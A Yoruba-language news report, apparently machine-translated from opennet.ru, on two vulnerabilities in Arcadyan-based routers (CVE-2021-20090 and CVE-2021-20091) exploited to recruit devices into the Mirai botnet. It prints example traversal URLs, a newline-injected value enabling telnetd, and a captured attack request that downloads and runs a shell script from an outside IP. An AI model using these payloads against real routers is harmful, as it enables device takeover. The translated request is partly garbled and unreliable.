A ti gbasilẹ ikọlu nla lori nẹtiwọọki lodi si awọn olulana ile ti famuwia nlo imuse olupin HTTP kan lati ile-iṣẹ Arcadyan. Lati ni iṣakoso lori awọn ẹrọ, apapọ awọn ailagbara meji ni a lo ti o fun laaye ipaniyan latọna jijin ti koodu lainidii pẹlu awọn ẹtọ gbongbo. Iṣoro naa ni ipa lori iwọn iṣẹtọ ti awọn olulana ADSL lati Arcadyan, ASUS ati Buffalo, ati awọn ẹrọ ti a pese labẹ awọn burandi Beeline (iṣoro naa ti jẹrisi ni Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ati miiran Telikomu awọn oniṣẹ. O ṣe akiyesi pe iṣoro naa ti wa ni Arcadyan famuwia fun diẹ ẹ sii ju ọdun 10 ati ni akoko yii ti ṣakoso lati lọ si o kere ju awọn awoṣe ẹrọ 20 lati awọn olupese oriṣiriṣi 17.
Ailagbara akọkọ, CVE-2021-20090, jẹ ki o ṣee ṣe lati wọle si eyikeyi iwe afọwọkọ wiwo wẹẹbu laisi ijẹrisi. Ohun pataki ti ailagbara ni pe ni wiwo wẹẹbu, diẹ ninu awọn ilana nipasẹ eyiti awọn aworan, awọn faili CSS ati awọn iwe afọwọkọ JavaScript ti wa ni wiwọle laisi ijẹrisi. Ni ọran yii, awọn ilana fun eyiti wiwọle laisi ijẹrisi gba laaye ni a ṣayẹwo ni lilo iboju-boju akọkọ. Pato awọn ohun kikọ “../” ni awọn ọna lati lọ si itọsọna obi ti dinamọ nipasẹ famuwia, ṣugbọn lilo “..% 2f” apapo ti fo. Nitorinaa, o ṣee ṣe lati ṣii awọn oju-iwe ti o ni aabo nigba fifiranṣẹ awọn ibeere bii “http://192.168.1.1/images/..%2findex.htm”.
Ailagbara keji, CVE-2021-20091, ngbanilaaye olumulo ti o ni ifọwọsi lati ṣe awọn ayipada si awọn eto eto ti ẹrọ naa nipa fifiranṣẹ awọn ọna kika ni pataki si iwe afọwọkọ apply_abstract.cgi, eyiti ko ṣayẹwo fun wiwa ti ohun kikọ laini tuntun ninu awọn paramita . Fun apẹẹrẹ, nigba ṣiṣe iṣẹ ping kan, ikọlu le pato iye “192.168.1.2%0AARC_SYS_TelnetdEnable=1” ni aaye pẹlu adiresi IP ti n ṣayẹwo, ati iwe afọwọkọ, nigbati o ṣẹda faili eto /tmp/etc/config/ .glbcfg, yoo kọ laini “AARC_SYS_TelnetdEnable=1” sinu rẹ “, eyiti o mu olupin telnetd ṣiṣẹ, eyiti o pese iraye si ikarahun aṣẹ ailopin pẹlu awọn ẹtọ gbongbo. Bakanna, nipa tito paramita AARC_SYS, o le ṣiṣẹ eyikeyi koodu lori eto naa. Ailagbara akọkọ jẹ ki o ṣee ṣe lati ṣiṣe iwe afọwọkọ iṣoro laisi ijẹrisi nipasẹ iraye si bi “/images/..%2fapply_abstract.cgi”.
Lati lo awọn ailagbara, ikọlu gbọdọ ni anfani lati fi ibeere ranṣẹ si ibudo nẹtiwọọki eyiti wiwo wẹẹbu n ṣiṣẹ. Ti n ṣe idajọ nipasẹ awọn agbara ti itankale ikọlu, ọpọlọpọ awọn oniṣẹ fi iwọle si awọn ẹrọ wọn lati inu nẹtiwọki ita lati jẹ ki o rọrun ayẹwo awọn iṣoro nipasẹ iṣẹ atilẹyin. Ti iraye si wiwo ba ni opin si nẹtiwọọki inu nikan, ikọlu le ṣee ṣe lati nẹtiwọọki ita ni lilo ilana “atunṣe DNS”. Awọn ailagbara ti wa ni lilo lọwọlọwọ lati so awọn olulana pọ si botnet Mirai: POST /images/..% 2fapply_abstract.cgi HTTP/1.1 Asopọ: Olumulo-Aṣoju: Iṣẹ dudu=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7 0%1A ARC_SYS_TelnetdEnable=0&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
orisun: opennet.ru